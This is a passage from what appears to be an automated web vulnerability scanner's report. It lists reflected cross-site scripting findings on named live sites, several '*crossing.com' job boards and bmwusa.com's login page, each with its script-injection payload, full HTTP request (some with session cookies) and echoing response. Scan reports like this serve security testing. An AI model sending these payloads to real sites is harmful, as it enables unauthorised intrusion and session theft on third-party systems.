Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133156

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.bilingualcrossing.com/?70508"><script>alert(1)</script>8ee9c52dde1=1">
...[SNIP]...

3.18. http://www.biotechcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d14"><script>alert(1)</script>e5a2e9ead51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?10d14"><script>alert(1)</script>e5a2e9ead51=1 HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rugpvnfefu0ijcftjlrvftr4p6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119759

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.biotechcrossing.com/?10d14"><script>alert(1)</script>e5a2e9ead51=1">
...[SNIP]...

3.19. http://www.bluecollarcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b61"><script>alert(1)</script>5c6959b8b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a6b61"><script>alert(1)</script>5c6959b8b1b=1 HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6aoaisevp9dgsf3glk0u3kfmh2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149457

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.bluecollarcrossing.com/?a6b61"><script>alert(1)</script>5c6959b8b1b=1">
...[SNIP]...

3.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8ef'-alert(1)-'df58b41138a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Secured/Content9d8ef'-alert(1)-'df58b41138a/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:52:57 GMT
Content-Length: 855
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:12:57 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...
<![CDATA[
window.top.location.href = '/Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fContent9d8ef'-alert(1)-'df58b41138a%2fForms%2fLogin.aspx&Scheme=http';//]]>
...[SNIP]...

3.21. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b684e'-alert(1)-'9a7cf2385d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Secured/Content/Formsb684e'-alert(1)-'9a7cf2385d7/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:53:01 GMT
Content-Length: 855
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:13:01 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...
<![CDATA[
window.top.location.href = '/Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fContent%2fFormsb684e'-alert(1)-'9a7cf2385d7%2fLogin.aspx&Scheme=http';//]]>
...[SNIP]...

3.22. http://www.businessanalystcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49621"><script>alert(1)</script>9f0d446c23d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?49621"><script>alert(1)</script>9f0d446c23d=1 HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nko903j62s8hf5uker5sj8gj93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124014

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.businessanalystcrossing.com/?49621"><script>alert(1)</script>9f0d446c23d=1">
...[SNIP]...

3.23. http://www.businessdevelopmentcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aad7"><script>alert(1)</script>02c3a5f308a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9aad7"><script>alert(1)</script>02c3a5f308a=1 HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=v9534hooe5m897h1jlbrva77o0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116498

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.businessdevelopmentcrossing.com/?9aad7"><script>alert(1)</script>02c3a5f308a=1">
...[SNIP]...

3.24. http://www.callcentercrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6504"><script>alert(1)</script>7995d983aaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c6504"><script>alert(1)</script>7995d983aaf=1 HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukmvtrcjop68ja9nosi7cu1gh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128714

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.callcentercrossing.com/?c6504"><script>alert(1)</script>7995d983aaf=1">
...[SNIP]...

3.25. http://www.chefcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e49f"><script>alert(1)</script>83eb7ba08ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7e49f"><script>alert(1)</script>83eb7ba08ba=1 HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=h114rspv6dqv9rpk6cv7rlc1e3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108693

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.chefcrossing.com/?7e49f"><script>alert(1)</script>83eb7ba08ba=1">
...[SNIP]...

3.26. http://www.civilengineeringcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7038b"><script>alert(1)</script>ca314792d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7038b"><script>alert(1)</script>ca314792d87=1 HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qi73gk7b0plggdca89edb7am13; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106933

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.civilengineeringcrossing.com/?7038b"><script>alert(1)</script>ca314792d87=1">
...[SNIP]...

3.27. http://www.clevelcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55eeb"><script>alert(1)</script>20005e8749b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?55eeb"><script>alert(1)</script>20005e8749b=1 HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fqj28nd85kg23ge7evi2b009i7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115435

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.clevelcrossing.com/?55eeb"><script>alert(1)</script>20005e8749b=1">
...[SNIP]...

3.28. http://www.clinicalresearchcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858e3"><script>alert(1)</script>870d36a3611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?858e3"><script>alert(1)</script>870d36a3611=1 HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m4vok3ds4b8veedmh32e13pcl6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101481

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.clinicalresearchcrossing.com/?858e3"><script>alert(1)</script>870d36a3611=1">
...[SNIP]...

3.29. http://www.compliancecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72153"><script>alert(1)</script>0fab5129a6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?72153"><script>alert(1)</script>0fab5129a6b=1 HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mb7anjkk7acvsh1kr8ousr40i4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135107

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.compliancecrossing.com/?72153"><script>alert(1)</script>0fab5129a6b=1">
...[SNIP]...

3.30. http://www.computeraideddesigncrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1752d"><script>alert(1)</script>11735ab5ac7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

